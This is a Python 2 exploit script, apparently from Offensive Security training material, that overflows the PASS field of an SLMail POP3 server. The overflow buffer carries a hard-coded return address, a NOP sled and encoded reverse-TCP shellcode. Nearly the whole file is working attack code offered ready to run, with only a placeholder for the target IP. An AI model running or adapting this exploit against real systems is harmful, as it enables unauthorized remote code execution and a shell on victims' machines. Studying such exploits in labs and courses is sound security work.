pwkBOF.py

#!/usr/bin/python
# BoF for SLMail
# Original PoC from Offensive Security
# IP address is hard-coded

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Shellcode is a reverse TCP shell, encoded with x86 Shikata ga nai
shellcode = ("\xb8\xb4\x46\xeb\xdb\xdd\xc7\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x52\x31\x46\x12\x83\xc6\x04\x03\xf2\x48\x09\x2e\x06\xbc\x4f"
"\xd1\xf6\x3d\x30\x5b\x13\x0c\x70\x3f\x50\x3f\x40\x4b\x34\xcc"
"\x2b\x19\xac\x47\x59\xb6\xc3\xe0\xd4\xe0\xea\xf1\x45\xd0\x6d"
"\x72\x94\x05\x4d\x4b\x57\x58\x8c\x8c\x8a\x91\xdc\x45\xc0\x04"
"\xf0\xe2\x9c\x94\x7b\xb8\x31\x9d\x98\x09\x33\x8c\x0f\x01\x6a"
"\x0e\xae\xc6\x06\x07\xa8\x0b\x22\xd1\x43\xff\xd8\xe0\x85\x31"
"\x20\x4e\xe8\xfd\xd3\x8e\x2d\x39\x0c\xe5\x47\x39\xb1\xfe\x9c"
"\x43\x6d\x8a\x06\xe3\xe6\x2c\xe2\x15\x2a\xaa\x61\x19\x87\xb8"
"\x2d\x3e\x16\x6c\x46\x3a\x93\x93\x88\xca\xe7\xb7\x0c\x96\xbc"
"\xd6\x15\x72\x12\xe6\x45\xdd\xcb\x42\x0e\xf0\x18\xff\x4d\x9d"
"\xed\x32\x6d\x5d\x7a\x44\x1e\x6f\x25\xfe\x88\xc3\xae\xd8\x4f"
"\x23\x85\x9d\xdf\xda\x26\xde\xf6\x18\x72\x8e\x60\x88\xfb\x45"
"\x70\x35\x2e\xc9\x20\x99\x81\xaa\x90\x59\x72\x43\xfa\x55\xad"
"\x73\x05\xbc\xc6\x1e\xfc\x57\xe3\xd5\xfe\x53\x9b\xeb\xfe\x9a"
"\xe7\x65\x18\xf6\x07\x20\xb3\x6f\xb1\x69\x4f\x11\x3e\xa4\x2a"
"\x11\xb4\x4b\xcb\xdc\x3d\x21\xdf\x89\xcd\x7c\xbd\x1c\xd1\xaa"
"\xa9\xc3\x40\x31\x29\x8d\x78\xee\x7e\xda\x4f\xe7\xea\xf6\xf6"
"\x51\x08\x0b\x6e\x99\x88\xd0\x53\x24\x11\x94\xe8\x02\x01\x60"
"\xf0\x0e\x75\x3c\xa7\xd8\x23\xfa\x11\xab\x9d\x54\xcd\x65\x49"
"\x20\x3d\xb6\x0f\x2d\x68\x40\xef\x9c\xc5\x15\x10\x10\x82\x91"
"\x69\x4c\x32\x5d\xa0\xd4\x52\xbc\x60\x21\xfb\x19\xe1\x88\x66"
"\x9a\xdc\xcf\x9e\x19\xd4\xaf\x64\x01\x9d\xaa\x21\x85\x4e\xc7"
"\x3a\x60\x70\x74\x3a\xa1")

buffer = 'A' * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode

try:
    print "Sending evil buffer..."
    connect = s.connect(('<ip address>',110))
    data = s.recv(1024)
    s.send('USER username' + '\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!"

except:
    print "Could not connect to POP3"